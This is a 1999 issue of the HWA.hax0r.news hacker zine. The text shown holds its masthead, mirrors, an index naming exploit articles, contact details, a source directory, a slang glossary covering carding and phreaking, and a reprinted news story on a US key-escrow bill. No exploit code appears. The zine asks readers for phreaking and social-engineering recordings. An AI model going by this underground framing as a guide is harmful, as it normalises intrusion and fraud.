[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

New mirror sites

http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com, thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html          ** NEW **
http://www.alldas.de/hwaidx1.htm                 ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (Remember I'm doing this for
me, not you; the fact some people happen to get a kick/use out of it is of
secondary importance.)

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK, or with news sites such as AntiOnline
or the Hacker News Network (HNN), or mailing lists such as BUGTRAQ or ISN,
nor could any other 'digest' of this type do so. It *is* intended, however,
to complement such material and provide a reference to those who follow the
culture by keeping tabs on as many sources as possible and providing links
to further info. It's a labour of love and will be continued for as long as
I feel like it. I'm not motivated by dollars or the illusion of fame; did
you ever notice how the most famous/infamous hackers are the ones that get
caught? There's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
                   Welcome to HWA.hax0r.news ... #30
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop by and
idle a while and say hi...

*******************************************************************
***  /join #HWA.hax0r.news on EFnet   the key is `zwen'          ***
***                                                             ***
***  please join to discuss or impart news on techno/phac scene ***
***  stuff or just to hang out ... someone is usually around    ***
***  24/7                                                       ***
***                                                             ***
***  Note that the channel isn't there to entertain you, it's   ***
***  for you to talk to us and impart news; if you're looking   ***
***  for fun then do NOT join our channel, try #weirdwigs or    ***
***  something... we're not #chatzone or #hack                  ***
*******************************************************************

=-------------------------------------------------------------------------=
                               Issue #30
=--------------------------------------------------------------------------=
                               [ INDEX ]
=--------------------------------------------------------------------------=
 Key     Intros
=--------------------------------------------------------------------------=

 00.0 .. COPYRIGHTS
 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
 00.2 .. SOURCES
 00.3 .. THIS IS WHO WE ARE
 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
 00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
 Key     Content
=--------------------------------------------------------------------------=

 01.0 .. GREETS
 01.1 .. Last minute stuff, rumours, newsbytes
 01.2 .. Mailbag
 02.0 .. From the Editor
 03.0 .. Key Escrow bill up for vote again
 04.0 .. The lost art of IRC warfare using eggdrop bots
 05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1
 06.0 .. The State of Crypto today
 07.0 .. Using a backdoor in a firewalled system
 08.0 .. PacketStorm Security Sells Out?
 09.0 .. CryptoGram Aug 15th '99
 10.0 .. TELNET.EXE HEAP OVERFLOW
 11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE
 12.0 .. THE MUSIC INDUSTRY'S "CYBER-SHERIFF"
 13.0 .. ReDaTtAcK CHARGED ANYWAYS
 14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE
 15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET
 16.0 .. E-COMMERCE AND PRIVACY
 17.0 .. IDENTITY-THEFT
 18.0 .. Y2K-THE MOVIE
 19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES
 20.0 .. Y2K PROBLEMS
 21.0 .. GISB WILL USE PGP
 22.0 .. SURF ANONYMOUS FOR $5
 23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER
 24.0 .. PROJECTGAMMA BACK ONLINE
 25.0 .. DETECTING INTRUDERS IN LINUX
 26.0 .. WIRELESS CRIME-FIGHTING
 27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS
 28.0 .. JAPAN CLEARS WIRETAP BILL
 29.0 .. Warez Groups Hit With Racketeering Charges
 30.0 .. Public UK Sites Susceptible to Attack
 31.0 .. Mitnick Prosecutor Moving to Private Practice
 32.0 .. NIPC Head Talks About FidNet
 33.0 .. Spoofing revisited (w00w00)
 34.0 .. 2 Swedish men charged with hacking U.S. computers
 35.0 .. Feds delay network
 36.0 .. The Effects of War on the Yugoslavian Network
 37.0 .. Survey Finds Internet Full of Holes
 38.0 .. Hacking Into an IT Career
 39.0 .. SETI@Home, Largest Computation Ever
 40.0 .. Hong Kong Blondes Labeled a Fraud
 41.0 .. Peace Prize Winner Warns of Cyber War
 42.0 .. Mitnick Still Denied Kosher Food
 43.0 .. Cable Pirates Busted
 44.0 .. CSIS Admits Web Defacement
 45.0 .. Win32.Kriz Set To Go Off Christmas Day
 46.0 .. MS Windows Media Audio Broke One Day After Release
 47.0 .. Available Soon, Freedom!
 48.0 .. AOL hacking IM users?
 49.0 .. Anti-gay site is hacked
 50.0 .. Indonesian CyberWar? Or Not?
 51.0 .. Gov Wants to Break Into Personal Computers, Legally
 52.0 .. Hearings to be Held on Echelon
 53.0 .. AOL Password Scam Uncovered
 54.0 .. Bronc's Defcon VII Review
 55.0 .. Y2K Survival Catalog
 56.0 .. BELGIAN BANK COMPROMISED
 57.0 .. CARDING IN NEWCASTLE
 58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge
 59.0 .. Watching the digital detectives
 60.0 .. Microsoft acknowledges software glitch that exposes e-mail passwords
 61.0 .. U.S. to seek new computer surveillance power
 62.0 .. Code cracker worries cryptographers
 63.0 .. AntiOnline offers infosec website hosting
 64.0 .. PKI yesterday, today and tomorrow
 65.0 .. Microsoft Advisory: double byte code page vulnerability
 66.0 .. RHSA: denial of service attack in in.telnetd
 67.0 .. [EuroHaCk] stealth-code
 68.0 .. RHSA: buffer overflow in libtermcap tgetent()
 69.0 .. Possible AOL IM buffer overflow
 70.0 .. L0pht security advisory: Attackers can remotely add default route entries
 71.0 .. Setuid bug in Oracle
 72.0 .. Vulnerability In LSA on Windows NT SP5
 73.0 .. w00w00's efnet ircd advisory (exploit included)
 74.0 .. hiperbomb.c - reboot a hiperarc router
 75.0 .. HP Security Bulletins Digest
 76.0 .. cfingerd exploit
 77.0 .. Microsoft Advisory: Patch Available for "Terminal Server Connection Request Flooding"

=--------------------------------------------------------------------------=

 AD.S   .. Post your site ads or etc here, if you can offer something in
           return that's tres cool, if not we'll consider ur ad anyways so
           send it in. Ads for other zines are ok too btw, just mention us
           in yours; please remember to include links and an email contact.
           Corporate ads will be considered also, and if your company wishes
           to donate to or participate in the upcoming Canc0n99 event send
           in your suggestions and ads now... n.b. date and time may be
           pushed back, join the mailing list for up to date information.
           Current dates: POSTPONED til further notice, place: TBA.
 Ha.Ha  .. Humour and puzzles
           Hey You!
           =------=
           Send in humour for this section! I need a laugh and it's hard
           to find good stuff... ;)
 SITE.1 .. Featured site
 H.W    .. Hacked Websites
 A.0    .. APPENDICES
 A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA. IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF "ME EITHER"S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY
OR EXPECTED BUT ARE APPRECIATED; the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY. IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY, current
email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS. IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL. THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C), WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE
YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so I'll print any and all news but will quote sources when the
source is known; if it's good enough for CNN it's good enough for me. And
I'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1  CONTACT INFORMATION AND MAIL DROP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc, well, now you can. (w00t) Please no more inflatable sheep or plastic
dog droppings, or fake vomit, thanks.

Send all goodies to:

        HWA NEWS
        P.O BOX 44118
        370 MAIN ST. NORTH
        BRAMPTON, ONTARIO
        CANADA
        L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard. I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard, preferably one that has some scenery from your
place of residence for my collection. I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return address
not necessary, just a "hey guys being cool in Bahrain, take it easy" will
do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz, I don't want pr0n.
- Picture postcards
- CD's, 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it.

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2  Sources ***
      ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance). Unless otherwise noted, like msgs from
lists or news from other sites, articles and information are compiled and/or
sourced by Cruciphux, no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ (l0phtcrack)...http://www.l0pht.com/
NewsTrolls (daily news)...........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/  *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/        Electronic Underground Affiliation
http://ech0.cjb.net               ech0 Security
http://axon.jccc.net/hir/         Hackers Information Report
http://net-security.org           Net Security
http://www.403-security.org       Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits you
provide; if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not, and
it may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse, hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body "subscribe bugtraq". I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index: http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this list
may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor of
the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the
International Association for Cryptologic Research, EPIC, and VTW. He is a
frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
I'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3  THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...(  ''    ''   ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already, also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***  /join #HWA.hax0r.news on EFnet   the key is `zwen'          ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1; although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about, otherwise
   enjoy - Ed ...

@HWA

00.4  What's in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? Never mind, if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds'
this is the state of affairs. It ain't Steven Levy's HACKERS anymore. BTW to
all you up and comers, I'd highly recommend you get that book. It's almost
like buying a clue.

Anyway.. on with the show ..

- Editorial staff

@HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3 (revised). Check that issue for the FAQ, it won't
be reprinted unless changed in a big way, with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine is listed
below. Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)
!=       - Mathematical notation "is not equal to" or "does not equal".
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           as =/= (equals sign with a slash thru it) it also means !=, =< is
           equal to or less than and => is equal to or greater than (etc,
           this ain't fucking grade school, cripes, don't believe I just
           typed all that..)
AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)
AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe, at the least they could try leasing one??
*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC      - Chaos Computer Club (Germany)
*CON     - Conference, a place hackers, crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk, watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes; in popular
           hacker speak he's the guy that breaks into systems and is often
           (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
           I like jalapeno pepper dip or chives sour cream and onion, yum
           - Ed
Ebonics  - speaking like a rastafarian or hip dude of colour, also wigger.
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
           ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC      - End of Commentary
EoA      - End of Article or more commonly @HWA
EoF      - End of file
EoD      - End of diatribe (AOL'ers: look it up)
FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles, not high brow articles
           such as ours or other HNN affiliates ;)
du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.
*HACKER  - Read Steven Levy's HACKERS for the true definition, then see
           HAX0R
*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
           difficult to define, I think it is best defined as pop culture's
           view on The Hacker ala movies such as well erhm "Hackers" and
           The Net etc... usually used by "real" hackers or crackers in a
           derogatory or slang humorous way, like 'hax0r me some coffee?' or
           'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.
HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k.
HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html
J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI  - Missing on/from IRC
NFC      - Depends on context: No Further Comment or No Fucking Comment
NFR      - Network Flight Recorder (Do a websearch) see 0wn3d
NFW      - No fuckin' way
*0WN3D   - You are cracked and owned by an elite entity see pheer
*OFCS    - Oh for christ's sakes
PHACV    - And variations of same: Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups, Virus, Warfare
           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       C  - Carding
                       V  - Virus
                       W  - Warfare
                       A  - Anarchy (explosives etc, Jolly Roger's Cookbook
                            etc)
                       P  - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism
*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d
*RTFM    - Read the fucking manual - not always applicable since some manuals
           are pure shit, but if the answer you seek is indeed in the manual
           then you should have RTFM you dumb ass.
TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA      - To Be Arranged/To Be Announced also 2ba
TFS      - Tough fucking shit.
*w00t    - 1 - Reserved for the uber ereet, no one can say this without
           severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
           shit stirrers)
*wtf     - what the fuck, where the fuck, when the fuck etc ..
*ZEN     - The state you reach when you *think* you know everything (but
           really don't); usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0  Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like
to see more reader input, help me out here, what's good, what sucks etc, not
that I guarantee I'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet
Pyra
TwstdPair
_NeM_
D----Y
Dicentra
vexxation
sAs72
Spikeman
p0lix

Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (Happy Birthday)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/  ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1  Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..." - FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2  MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue.)

02.0  From the editor.
      ~~~~~~~~~~~~~~~~

    #include <stdio.h>      /* printf() */

    int main(void)
    {
        printf ("Read commented source!\n\n");

        /*
         * Issue #30... no comments this issue ...
         *
         *
         *
         * send submissions to: hwa@press.usmc.net
         */

        printf ("EoF.\n");
        return 0;
    }

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net. Complaints and all nastygrams and mai*lbombs
can go to /dev/null, nukes, synfloods and papasmurfs to 127.0.0.1, private
mail to cruciphux@dok.org

danke.

C*:.

03.0  Key-Escrow on the Move - Again
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/

contributed by evilwench

They aren't giving up.
The Cyberspace Electronic Security Act is currently being drafted by the Clinton administration. In this latest bill, the administration proposes that law enforcement agents have access to decryption keys held by recovery agents. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents. (Maybe the feeling is that if they keep submitting new bills, one of them, eventually, will get through. Unfortunately they are probably correct.)

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html

AUGUST 16, 1999

Bill reopens encryption access debate

BY DOUG BROWN (dbrown@fcw.com) AND L. SCOTT TILLETT (scott_tillett@fcw.com)

Renewing efforts to allow law enforcement agencies to access and read suspected criminals' encrypted electronic files, the Clinton administration has drafted a bill that would give those agencies access to the electronic "keys" held by third parties.

The Cyberspace Electronic Security Act, the drafting of which is being led by the Office of Management and Budget and the Justice Department, "updates law enforcement and privacy rules for our emerging world of widespread cryptography," according to an analysis accompanying the bill obtained by Federal Computer Week.

Encryption technology, according to the draft, is "an important tool for protecting the privacy of legitimate communications and stored data" but also has been used "to facilitate and hide unlawful activity by terrorists, drug traffickers, child pornographers and other criminals."

The new bill seeks to uncover that activity by allowing law enforcement officials to obtain the keys needed to decrypt messages by applying for search warrants or court orders, much as they might do to uncover other evidence.
The administration is concerned about the use of encryption technology because advances in recent years have made it extremely difficult for law enforcement officials to crack a code once they have intercepted a message.

The draft bill is the Clinton administration's latest effort to push for legislation that would make it easier for law enforcement agencies to intercept messages or data that they think would be helpful in criminal investigations.

In 1993 the administration introduced the Clipper Chip, a hardware-based encryption device designed to protect private communications but that would provide a "backdoor" for law enforcement officials to decrypt necessary data. The Clipper effort died after privacy groups and industry warned that law enforcement agencies could abuse the power.

"All this is the Clipper Chip revisited in a different flavor but not as effective," said Michael Anderson, president of computer forensics firm New Technologies Inc.

The administration also has blocked the export of certain advanced encryption technology that would defeat efforts to conduct digital wiretaps as part of its fight against international drug cartels and terrorists. But the software industry continues to fight for the lifting of export restrictions.

In the latest bill, the administration proposes that law enforcement agents have access - under limited circumstances - to decryption keys held by recovery agents, which are third-party warehouses of decryption keys that "unlock" complex codes that mask the readable form of the data. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents.

The proposed bill would provide new protections for lawful users of encryption. Currently, according to a summary of the bill that is part of a proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws guiding how recovery agents treat the decryption keys they store.
